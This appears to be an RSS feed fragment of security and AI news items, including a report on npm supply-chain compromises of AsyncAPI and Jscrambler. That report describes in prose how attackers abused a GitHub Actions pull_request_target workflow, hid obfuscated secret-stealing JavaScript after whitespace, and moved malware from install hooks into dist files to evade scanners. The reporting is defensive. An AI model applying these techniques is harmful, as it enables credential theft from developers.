<description><![CDATA[Romania’s National Agency for Cadastre and Land Registration (ANCPI) suffered a major disruption on Tuesday, July 14, when its e-Terra cadastre and land registry app became unavailable to users. What was first declared to be a “major technical incident” has now been confirmed as a cyber attack. W...]]></description>
<link>https://tsecurity.de/de/3673151/it-security-nachrichten/romanias-land-registry-hit-by-cyber-attack-data-allegedly-for-sale/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673151/it-security-nachrichten/romanias-land-registry-hit-by-cyber-attack-data-allegedly-for-sale/</guid>
<pubDate>Thu, 16 Jul 2026 12:54:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Romania’s National Agency for Cadastre and Land Registration (ANCPI) suffered a major disruption on Tuesday, July 14, when its e-Terra cadastre and land registry app became unavailable to users. What was first declared to be a “major technical incident” has now been confirmed as a cyber attack. While the circumstances are still being investigated by the competent state institutions, ANCPI stated that the data administered through its IT systems has not been compromised as a … <a href="https://www.helpnetsecurity.com/2026/07/16/romania-ancpi-cyber-attack/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/16/romania-ancpi-cyber-attack/">Romania’s land registry hit by cyber attack, data allegedly for sale</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Romania’s land registry hit by cyber attack, data allegedly for sale]]></title>
<description><![CDATA[Romania’s National Agency for Cadastre and Land Registration (ANCPI) suffered a major disruption on Tuesday, July 14, when its e-Terra cadastre and land registry app became unavailable to users. What was first declared to be a “major technical incident” has…
Read more →
The post Romania’s land re...]]></description>
<link>https://tsecurity.de/de/3673107/it-security-nachrichten/romanias-land-registry-hit-by-cyber-attack-data-allegedly-for-sale/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673107/it-security-nachrichten/romanias-land-registry-hit-by-cyber-attack-data-allegedly-for-sale/</guid>
<pubDate>Thu, 16 Jul 2026 12:36:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Romania’s National Agency for Cadastre and Land Registration (ANCPI) suffered a major disruption on Tuesday, July 14, when its e-Terra cadastre and land registry app became unavailable to users. What was first declared to be a “major technical incident” has…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/romanias-land-registry-hit-by-cyber-attack-data-allegedly-for-sale/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/romanias-land-registry-hit-by-cyber-attack-data-allegedly-for-sale/">Romania’s land registry hit by cyber attack, data allegedly for sale</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft makes Windows SSO prompts easier to manage]]></title>
<description><![CDATA[Microsoft is introducing a new registry-based policy that lets IT administrators automatically accept Windows SSO permissions on Windows 11 versions 24H2 and 25H2 devices managed with Microsoft Entra ID. Users with personal Microsoft accounts and devices outside policy-managed environments will…
...]]></description>
<link>https://tsecurity.de/de/3672936/it-security-nachrichten/microsoft-makes-windows-sso-prompts-easier-to-manage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672936/it-security-nachrichten/microsoft-makes-windows-sso-prompts-easier-to-manage/</guid>
<pubDate>Thu, 16 Jul 2026 11:23:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Microsoft is introducing a new registry-based policy that lets IT administrators automatically accept Windows SSO permissions on Windows 11 versions 24H2 and 25H2 devices managed with Microsoft Entra ID. Users with personal Microsoft accounts and devices outside policy-managed environments will…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/microsoft-makes-windows-sso-prompts-easier-to-manage/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/microsoft-makes-windows-sso-prompts-easier-to-manage/">Microsoft makes Windows SSO prompts easier to manage</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft makes Windows SSO prompts easier to manage]]></title>
<description><![CDATA[Microsoft is introducing a new registry-based policy that lets IT administrators automatically accept Windows SSO permissions on Windows 11 versions 24H2 and 25H2 devices managed with Microsoft Entra ID. Users with personal Microsoft accounts and devices outside policy-managed environments will c...]]></description>
<link>https://tsecurity.de/de/3672853/it-security-nachrichten/microsoft-makes-windows-sso-prompts-easier-to-manage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672853/it-security-nachrichten/microsoft-makes-windows-sso-prompts-easier-to-manage/</guid>
<pubDate>Thu, 16 Jul 2026 10:52:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Microsoft is introducing a new registry-based policy that lets IT administrators automatically accept Windows SSO permissions on Windows 11 versions 24H2 and 25H2 devices managed with Microsoft Entra ID. Users with personal Microsoft accounts and devices outside policy-managed environments will continue to receive SSO permission prompts. Admin control for SSO prompts in Windows (Source: Microsoft) Why Microsoft introduced it In the European Economic Area (EEA), Microsoft changed the Windows sign-in experience so users can choose … <a href="https://www.helpnetsecurity.com/2026/07/16/windows-sso-policy-admin-control/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/16/windows-sso-policy-admin-control/">Microsoft makes Windows SSO prompts easier to manage</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[NPM ecosystem hit with two new supply chain compromises]]></title>
<description><![CDATA[Attacks targeting developer ecosystems are increasing in frequency and sophistication, with Node.js developers firmly in this week’s crosshairs, as multiple npm packages belonging to the open-source AsyncAPI and Jscrambler Code Integrity were poisoned with malware following compromised developmen...]]></description>
<link>https://tsecurity.de/de/3671823/it-security-nachrichten/npm-ecosystem-hit-with-two-new-supply-chain-compromises/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671823/it-security-nachrichten/npm-ecosystem-hit-with-two-new-supply-chain-compromises/</guid>
<pubDate>Wed, 15 Jul 2026 22:38:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Attacks targeting developer ecosystems are increasing in frequency and sophistication, with Node.js developers firmly in this week’s crosshairs, as multiple npm packages belonging to the open-source AsyncAPI and Jscrambler Code Integrity were poisoned with malware following compromised development credentials.</p>



<p class="wp-block-paragraph">The incidents highlight the cascading effect of software supply chain attacks in which stolen credentials are then used to perpetrate additional compromises. Security researchers advise organizations to completely rebuild from clean images any developer machines that have installed a poisoned package — and to rotate all npm tokens, source control access, cloud credentials, CI/CD secrets, SSH keys, signing keys, and browser sessions.</p>



<p class="wp-block-paragraph">Affected packages include: <a href="mailto:jscrambler@8.14.0">jscrambler@8.14.0</a>, <a href="mailto:jscrambler@8.16.0">jscrambler@8.16.0</a>, <a href="mailto:jscrambler@8.17.0">jscrambler@8.17.0</a>, <a href="mailto:jscrambler@8.18.0">jscrambler@8.18.0</a>, <a href="mailto:jscrambler@8.20.0">jscrambler@8.20.0</a>, @asyncapi/generator-helpers@1.1.1, @asyncapi/generator-components@0.7.1, @asyncapi/generator@3.3.1, @asyncapi/specs@6.11.2 and @asyncapi/specs@6.11.2-alpha.1.</p>



<p class="wp-block-paragraph">However, packages that list any of the above poisoned packages as dependencies may also be impacted, including those from the same projects, such as jscrambler-webpack-plugin 8.6.2, gulp-jscrambler 8.6.2, grunt-jscrambler 8.5.2, and jscrambler-metro-plugin 9.0.2.</p>



<h2 class="wp-block-heading">Vulnerable GitHub Actions workflow used as entry point</h2>



<p class="wp-block-paragraph">The attack against AsyncAPI, an open-source reference specification and toolset for implementing event-driven architectures and asynchronous APIs, occurred on Tuesday and was independently detected by multiple security companies monitoring the npm registry, including Upwind, Socket.dev, Wiz, StepSecurity, and Aikido Security.</p>



<p class="wp-block-paragraph">According to the researchers’ analysis, attackers took advantage of a <a href="https://www.csoonline.com/article/4008621/github-actions-attack-renders-even-security-aware-orgs-vulnerable.html">known configuration vulnerability in a GitHub Actions CI/CD workflow</a> that had been reported in April. The flaw involves the <code>pull_request_target</code> event, which executes whenever a new pull request is made. When triggered, the workflow automatically checks out and executes the developer’s submitted pull request code in the Actions container, but this is done in the context of the base repository with full access to secrets.</p>



<p class="wp-block-paragraph">The AsyncAPI project had <a href="https://github.com/asyncapi/generator/pull/2092">a proposed fix</a> since May 17, but the fix had not yet gone through the full review and was not merged into the main branch.</p>



<p class="wp-block-paragraph">“At 05:08 UTC, the attacker opened PR #2155 containing a markdown file with obfuscated JavaScript hidden after approximately 1,000 bytes of whitespace,” researchers from Wiz explained <a href="https://www.wiz.io/blog/m-red-team-asyncapi-supply-chain-compromise-via-github-actions">in their report</a>. “The payload was designed to scan the GitHub Actions runner’s environment for secrets and exfiltrate them to a dead-drop URL on the rentry.co pastebin.”</p>



<p class="wp-block-paragraph">When a GitHub Actions workflow is triggered and is executed in an environment, a temporary <code>GITHUB_TOKEN</code> is generated to allow for authenticated git commands against the repository. Other tokens might also be included.</p>



<p class="wp-block-paragraph">In this case, the attackers managed to obtain a token associated with asyncapi-bot, a service account that had access across the entire AsyncAPI organization on GitHub. This allowed them to perform malicious code commits in two separate repositories. Those commits then triggered automated build workflows that generated and published the npm packages.</p>



<p class="wp-block-paragraph">The payload bundled in the packages shares some similarities with a malware framework called Miasma that was used in previous supply chain compromises. However, the malware code appears to be significantly different from previously documented variants.</p>



<p class="wp-block-paragraph">The first-stage code downloads a secondary trojan payload that has variants for Linux, Windows, and macOS. This is a modular malware framework with credential theft capabilities that targets passwords and cookies saved inside browsers, SSH keys, npm and GitHub tokens, AWS credentials, macOS Keychain, and cryptocurrency wallets.</p>



<p class="wp-block-paragraph">The trojan communicated with a command-and-control server and can accept remote commands to perform file operations, list directories, and exfiltrate data.</p>



<h2 class="wp-block-heading">Jscrambler compromised via leaked npm credential</h2>



<p class="wp-block-paragraph">The Jscrambler attack happened over the weekend on July 11 with attackers publishing multiple trojanized versions in two waves. Jscrambler Code Integrity is a client-side security library designed to protect JavaScript-based web and mobile applications against tampering and reverse engineering.</p>



<p class="wp-block-paragraph">Jscrambler published <a href="https://jscrambler.com/blog/security-advisory-malicious-npm-package">an advisory</a> in response to the incident in which it clarified that the attackers published malicious versions of the package using a npm publishing credential. However, unlike the AsyncAPI case, how that credential was leaked in the first place is not clear.</p>



<p class="wp-block-paragraph">Initially the attackers released new package versions with two malicious scripts that get executed at install time using a preinstall hook in the configuration script. The scripts also execute platform-specific binaries for Linux, macOS, and Windows embedded in an obfuscated container.</p>



<p class="wp-block-paragraph">Because <code>preinstall</code> or <code>postinstall</code> hooks are common ways to deliver malware in npm packages, they are automatically checked by security tools. To avoid detection, the attackers pivoted to a method that involved injecting the malicious code directly in the <code>dist/index.js</code> and <code>dist/bin/jscrambler.js</code> files. This changed the malware execution from package installation time to when the package gets imported into other projects or the Jscrambler CLI is invoked.</p>



<p class="wp-block-paragraph">The embedded malware executables for different platforms are written in Rust and, according to <a href="https://socket.dev/blog/jscrambler-supply-chain-attack">Socket.dev’s analysis</a>, were “a broad, developer-focused credential and secret harvester” that targeted browser-extension crypto wallets, API keys from AI coding assistants and MCP servers, cloud credentials for AWS, Azure and GCP, authentication tokens for messaging applications (such as Discord, Slack, and Telegram), password stores from browsers, Steam, and KDE.<br><br><br></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What 80% AI-written test pipelines actually cost]]></title>
<description><![CDATA[The first time I heard someone say their AI now wrote 80% of their tests, I asked the obvious question. Eighty percent of what?



After 20 years building and leading test automation for consumer-scale platforms, my honest answer turned out to be eighty percent of the typing, not eighty percent o...]]></description>
<link>https://tsecurity.de/de/3671153/ai-nachrichten/what-80-ai-written-test-pipelines-actually-cost/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671153/ai-nachrichten/what-80-ai-written-test-pipelines-actually-cost/</guid>
<pubDate>Wed, 15 Jul 2026 17:19:22 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The first time I heard someone say their AI now wrote 80% of their tests, I asked the obvious question. Eighty percent of what?</p>



<p class="wp-block-paragraph">After 20 years building and leading test automation for consumer-scale platforms, my honest answer turned out to be eighty percent of the <em>typing</em>, not eighty percent of the <em>engineering</em>. The remaining twenty was where the work still lived. Budgeting for two percent of leftover effort was the mistake. When the real number was closer to thirty, that gap was the difference between a pipeline that shipped and one that quietly built up a queue of half-trusted features nobody could rely on.</p>



<p class="wp-block-paragraph">This piece is about that gap. As an independent research project on LLM-augmented testing methodology, I built a six-stage agentic pipeline that takes a design in Figma and produces running tests in WebDriverIO, connected end to end over the <a href="https://modelcontextprotocol.io/">Model Context Protocol</a>. It works. It has been useful. And the parts that broke surprised me, because they were not the parts the hype cycle tells you to worry about.</p>



<h2 class="wp-block-heading">How I wired a six-stage pipeline over one protocol</h2>



<p class="wp-block-paragraph">The pipeline runs six stages in sequence, each owned by a different agent, with every handoff crossing MCP.</p>



<p class="wp-block-paragraph">Six-stage agentic test pipeline: design capture → requirements writer → ticket opener → code generator → test-case writer → automation generator. Each stage carries an MCP handoff and a provenance stamp.</p>



<p class="wp-block-paragraph">The end-to-end trace links a pull request back to a Jira ticket, a requirements section and a Figma frame. Each artifact is stamped with the agent that produced it, the model it used and the inputs it was given.</p>



<p class="wp-block-paragraph">MCP is the boring middle that makes any of this work. The cliché is that MCP is “USB-C for AI”: one open protocol, any tool. Like most analogies, it is about eighty percent right. The part that matters is the eighty: I do not have to write a custom adapter for every system the agent talks to. One MCP server per tool and every agent talks to all of them the same way.</p>



<p class="wp-block-paragraph"><strong>Typed handoffs between agents are my own architecture, layered on top of MCP rather than provided by it.</strong> Each agent writes a typed artifact the next agent reads. Each handoff is logged with provenance. When something went wrong six stages in, I could replay the chain. Without that discipline, a multi-agent pipeline is a debugger’s worst day. You know the test plan is wrong. You cannot tell whether the mistake came from the Figma read, the requirements interpretation or the ticket scaffolding. With it, I could point at exactly which stage went sideways and which inputs it was looking at when it did. The pattern lives in a <a href="https://github.com/SuneetMalhotra/agent-harness">public MIT-licensed reference implementation</a> for any reader who wants to run it.</p>



<p class="wp-block-paragraph"><strong>The sixteen-minute number is the marketing number.</strong> I ran the full chain end to end in about sixteen minutes on a synthetic net-new screen, Figma in, automation suite out. That repeated across my runs; it is not a demo trick. But sixteen minutes is the part of the story most fun to tell and least useful to learn from. It is what gets quoted in the all-hands. The hours that come after, when a human reviews each handoff, are where the work actually lives.</p>



<h2 class="wp-block-heading">What actually broke in production-style runs</h2>



<p class="wp-block-paragraph">The failures that stalled my pipeline were rarely the ones I expected.</p>



<p class="wp-block-paragraph">I expected hallucinated APIs. I got them: the agent confidently called endpoint names that sounded right but did not exist. I expected sparse-spec-in, sparse-spec-out, where a Figma frame with no annotations produced a requirements doc with vague acceptance criteria, every time. I expected locator drift, the common UI-automation failure mode where a renamed component silently breaks an entire test suite. There is solid <a href="https://martinfowler.com/articles/nonDeterminism.html">outside writing on non-determinism in tests</a> covering this whole family of failure modes, and the agent inherited every one.</p>



<p class="wp-block-paragraph">What I did not expect, and what kept the pipeline down longer than any of the above, was the plumbing.</p>



<p class="wp-block-paragraph">The model backend timed out under load. It lost credentials silently and started returning empty strings, which the agent then read as confidence. A duplicate consumer on a shared long-poll API endpoint produced an HTTP 409 conflict that broke delivery without throwing anything visible. One unguarded exception inside one agent aborted a whole shared scheduler run and took the other agents in the registry down with it. The single worst incident cost me three hours to find. An environment variable had silently rotated overnight; every agent in the fleet was returning structurally valid but semantically empty requirements docs; the downstream stages were dutifully generating tests against nothing.</p>



<p class="wp-block-paragraph">None of those are model bugs. They are infrastructure. The agent literature, which is what I went looking through when I started this work, mostly does not talk about them.</p>



<p class="wp-block-paragraph">The fix was not better prompts. It was <a href="https://martinfowler.com/bliki/CircuitBreaker.html">circuit-breaker-style</a> review checkpoints between stages and what I now call <strong>the four-guard discipline</strong>: four small guards I consider non-negotiable on any unattended agentic pipeline. The bulkhead pattern from microservices is the most consequential. An unhandled exception inside one agent can no longer abort the shared run; the offending agent fails fast with a structured error and the others keep going. Paired with that, a pure-data fallback ensures a model timeout produces a deterministic output explicitly marked as degraded mode, rather than an empty string the next stage will misread as confidence. A single-owner lease sits on every shared external endpoint, the cure for the duplicate-consumer incident that ate one of my Sunday afternoons. The cheapest guard was the last to arrive: a one-line synthetic canary every agent has to produce a known correct response to before any real work begins, so a credentials rotation or silent backend failure trips an alert before downstream stages have generated artifacts against garbage.</p>



<p class="wp-block-paragraph">None of these guards is novel. They are textbook stability patterns at a new boundary: the seam between the LLM agent and the rest of the system, which most of the existing agent literature still treats as a solved problem.</p>



<h2 class="wp-block-heading">The 20% you don’t see, and when not to do this</h2>



<p class="wp-block-paragraph">Here is the part the demo videos leave out. Even when the pipeline works, the human time per stage does not go to zero.</p>



<p class="wp-block-paragraph">Human review time per ticket across five pipeline stages: code review 60-180 min, automation review and flaky-fix loop 30-90 min, ticket architecture and sequencing 30-60 min, test data and environment 15-30 min, requirements review 20-30 min. Net: the human still spends 20-30% of the original effort, almost all of it reviewing rather than creating.</p>



<p class="wp-block-paragraph"><strong>Net of all that, the human still spends twenty to thirty percent of the original effort, almost all of it reviewing rather than creating.</strong> The pipeline saves seventy to eighty percent, not ninety-eight. The trap is budgeting for the two percent you do not save.</p>



<p class="wp-block-paragraph">When does this kind of pipeline make sense? In my experience, when the Figma is richly annotated and acceptance criteria are clear up front; when there is review capacity to absorb the work the pipeline shifts onto humans; when the stack is well represented in the training data; and when the feature is net-new rather than a deep edit of legacy code. When does it not? When the design lives on a whiteboard. When the integration touches old code with hidden contracts. When the path is regulated or safety-critical. When there is no senior reviewer who can hold the line. When the work is exploratory and writing the spec is the actual point of the exercise.</p>



<p class="wp-block-paragraph">Teams I have seen succeed with agentic pipelines budget for the rework explicitly, staff the review queue and treat the saved hours as capacity for harder problems rather than headcount they can release. Teams I have seen struggle did the opposite: declared victory at the demo and quietly accumulated a backlog of half-trusted features the next quarter had to clean up.</p>



<p class="wp-block-paragraph">The right unit of measurement is not how much the pipeline generates. It is how much of what it generates a human still has to touch before you would ship it. Call it <strong>the 80/20 rework rule</strong>: measure the rework, not the generation. The teams that get the rework number right are the ones whose AI investments compound. The teams that stop counting at the headline percentage are the ones that own the cleanup six months later.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.infoworld.com/expert-contributor-network/"><strong><u>Want to join?</u></strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Stop Using If-Else Chains: Use the Registry Pattern in Python Instead]]></title>
<description><![CDATA[Learn a cleaner, more extensible way to dispatch logic in Python.]]></description>
<link>https://tsecurity.de/de/3670944/ai-nachrichten/stop-using-if-else-chains-use-the-registry-pattern-in-python-instead/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670944/ai-nachrichten/stop-using-if-else-chains-use-the-registry-pattern-in-python-instead/</guid>
<pubDate>Wed, 15 Jul 2026 16:19:36 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Learn a cleaner, more extensible way to dispatch logic in Python.]]></content:encoded>
</item>
<item>
<title><![CDATA[KAPE 101: A Kroll Artifact Parser and Extractor Cheatsheet]]></title>
<description><![CDATA[Spend time performing forensic analysis on the Windows Operating System and you'll see a host of artifacts that can be used to identify adversary activity. From changes to the registry to the System Resource Utilization Monitor, Windows artifacts run deep. The challenge is locating, extracting, a...]]></description>
<link>https://tsecurity.de/de/3670892/it-security-nachrichten/kape-101-a-kroll-artifact-parser-and-extractor-cheatsheet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670892/it-security-nachrichten/kape-101-a-kroll-artifact-parser-and-extractor-cheatsheet/</guid>
<pubDate>Wed, 15 Jul 2026 16:08:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1280" height="720" src="https://www.blackhillsinfosec.com/wp-content/uploads/2026/07/kape101_header-1.png" class="attachment-full size-full wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.blackhillsinfosec.com/wp-content/uploads/2026/07/kape101_header-1.png 1280w, https://www.blackhillsinfosec.com/wp-content/uploads/2026/07/kape101_header-1-500x281.png 500w, https://www.blackhillsinfosec.com/wp-content/uploads/2026/07/kape101_header-1-1024x576.png 1024w, https://www.blackhillsinfosec.com/wp-content/uploads/2026/07/kape101_header-1-768x432.png 768w" sizes="(max-width: 1280px) 100vw, 1280px"></p>
<p>Spend time performing forensic analysis on the Windows Operating System and you'll see a host of artifacts that can be used to identify adversary activity. From changes to the registry to the System Resource Utilization Monitor, Windows artifacts run deep. The challenge is locating, extracting, and parsing these artifacts in an efficient manner.</p>
<p>The post <a href="https://www.blackhillsinfosec.com/kape-cheatsheet/">KAPE 101: A Kroll Artifact Parser and Extractor Cheatsheet</a> appeared first on <a href="https://www.blackhillsinfosec.com/">Black Hills Information Security, Inc.</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[LegacyHive: Windows-Privilegieneskalation schon vor dem Patch greifbar]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Ein neuer Windows-Exploit namens LegacyHive zielt auf die User Profile Service-Komponente (ProfSvc) und ermöglicht das willkürliche Laden von Registry-Hives zur Privilegieneskalation. Der Proof-of-Concept ist laut den Angaben des Forschers unmittelbar nach dem Patch-Tuesday...]]></description>
<link>https://tsecurity.de/de/3670749/it-security-nachrichten/legacyhive-windows-privilegieneskalation-schon-vor-dem-patch-greifbar/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670749/it-security-nachrichten/legacyhive-windows-privilegieneskalation-schon-vor-dem-patch-greifbar/</guid>
<pubDate>Wed, 15 Jul 2026 15:09:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-legacyhive-windows-registry-hive-exploit.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-legacyhive-windows-registry-hive-exploit.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-legacyhive-windows-registry-hive-exploit-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-legacyhive-windows-registry-hive-exploit-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-legacyhive-windows-registry-hive-exploit-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-legacyhive-windows-registry-hive-exploit-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-legacyhive-windows-registry-hive-exploit-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Ein neuer Windows-Exploit namens LegacyHive zielt auf die User Profile Service-Komponente (ProfSvc) und ermöglicht das willkürliche Laden von Registry-Hives zur Privilegieneskalation. Der Proof-of-Concept ist laut den Angaben des Forschers unmittelbar nach dem Patch-Tuesday-Update verfügbar geworden – und soll auf allen aktuell unterstützten Windows-Desktop- und Serverversionen funktionieren. Parallel dazu häufen sich 2026 […]</p>
<div><a href="https://www.it-boltwise.de/legacyhive-windows-privilegieneskalation-schon-vor-dem-patch-greifbar.html">... den vollständigen Artikel <strong>»LegacyHive: Windows-Privilegieneskalation schon vor dem Patch greifbar«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/legacyhive-windows-privilegieneskalation-schon-vor-dem-patch-greifbar.html">LegacyHive: Windows-Privilegieneskalation schon vor dem Patch greifbar</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Quelloffener MCP-Server von AWS beschleunigt Forschung]]></title>
<description><![CDATA[Mit einem quelloffenen MCP-Server will AWS die KI-gestützte Suche nach Forschungsergebnissen vereinfachen.
hafakot/Shutterstock.com



Auf dem UN-Gipfel „AI for Good“ in Genf hat Amazon Web Services (AWS) eine technologische Brücke vorgestellt, die die wissenschaftliche Arbeit revolutionieren kön...]]></description>
<link>https://tsecurity.de/de/3670664/it-security-nachrichten/quelloffener-mcp-server-von-aws-beschleunigt-forschung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670664/it-security-nachrichten/quelloffener-mcp-server-von-aws-beschleunigt-forschung/</guid>
<pubDate>Wed, 15 Jul 2026 14:38:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/shutterstock_2661455173_16_9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="AI" class="wp-image-4197329" width="1024" height="576" sizes="(max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Mit einem quelloffenen MCP-Server will AWS die KI-gestützte Suche nach Forschungsergebnissen vereinfachen.</p>
</figcaption></figure><p class="imageCredit">hafakot/Shutterstock.com</p></div>



<p class="wp-block-paragraph">Auf dem UN-Gipfel „<a href="https://aiforgood.itu.int/">AI for Good</a>“ in Genf hat Amazon Web Services (AWS) eine technologische Brücke vorgestellt, die die wissenschaftliche Arbeit revolutionieren könnte. Ein neuer, quelloffener Server auf Basis des <a href="https://www.computerwoche.de/article/4031227/was-ist-model-context-protocol.html?">Model Context Protocol (MCP)</a> verbindet KI-Assistenten direkt mit der <a href="https://www.computerwoche.de/article/4153009/mcp-registry-aufbauen-so-gehts.html?">Registry of Open Data (RODA)</a> auf AWS.</p>



<p class="wp-block-paragraph">RODA ist eine der weltweit größten Sammlungen frei zugänglicher Forschungsdaten. Sie umfasst über 1.100 Datensätze von mehr als 400 Organisationen, darunter Schwergewichte wie die NASA, die <a href="https://www.noaa.gov/">NOAA</a> und die National Institutes of Health (NIH).</p>



<h2 class="wp-block-heading">Natürliche Sprache statt kryptischer Befehle</h2>



<p class="wp-block-paragraph">Damit will AWS eine Demokratisierung des Datenzugangs einläuten. Forscher müssen keine Experten für Datenbankstrukturen oder Cloud-Speicher (wie Amazon S3) mehr sein. Stattdessen können sie, wie es heißt, Coding-Assistenten wie <a href="https://www.computerwoche.de/article/4175182/4-tools-fur-spec-driven-development.html?utm=hybrid_search">Kiro</a> oder <a href="https://code.claude.com/docs">Claude Code</a> nutzen, um ihre Fragen in natürlicher Sprache zu stellen.</p>



<p class="wp-block-paragraph">So soll eine Anfrage wie „Welche Satellitenbilddaten gibt es zur Überwachung von Entwaldung?“ ausreichen, um sofort präzise Ergebnisse inklusive Beschreibungen und Datenvorschauen zu erhalten. Dabei fungiert der MCP-Server als intelligenter Vermittler, der den gesamten Katalog durchsucht, Metadaten inspiziert und sogar Dateiinhalte stichprobenartig prüft, um die Eignung für ein Projekt zu bewerten.</p>



<p class="wp-block-paragraph">Auch Deutschland ist bereits stark in diesem Ökosystem vertreten. Organisationen wie die Audi AG, das Helmholtz-Zentrum Hereon und der Max-Planck-Campus Tübingen stellen bereits Datensätze zur Verfügung.</p>



<h2 class="wp-block-heading">Einsatzszenarien</h2>



<p class="wp-block-paragraph">Ein entscheidender Aspekt der Initiative ist der Open-Source-Gedanke. Der MCP-Server steht unter der Apache-2.0-Lizenz frei auf GitHub zur Verfügung. Damit haben Forscher weltweit – unabhängig von der Größe oder den finanziellen Ressourcen ihrer Institution – Zugriff auf dieselben mächtigen Werkzeuge wie Elite-Universitäten.</p>



<p class="wp-block-paragraph">Laut AWS unterstützt das Tool zentrale Forschungsfelder wie:</p>



<ul class="wp-block-list">
<li>die Nachverfolgung von Krankheitsausbrüchen;</li>



<li>das Monitoring von Biodiversitätsverlusten;</li>



<li>die Genomforschung und Biowissenschaften; oder</li>



<li>die Modellierung des Meeresspiegelanstiegs.</li>
</ul>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[New LegacyHive Windows 0-day Vulnerability Allows Users  to Load Another User’s Registry]]></title>
<description><![CDATA[A proof-of-concept exploit dubbed LegacyHive has been released, enabling a Windows elevation-of-privilege vulnerability in the Windows User Profile Service that allows a standard user to load another user’s registry hive under their own registry classes root. Registry hives are files that store c...]]></description>
<link>https://tsecurity.de/de/3669705/it-security-nachrichten/new-legacyhive-windows-0-day-vulnerability-allows-users-to-load-another-users-registry/</link>
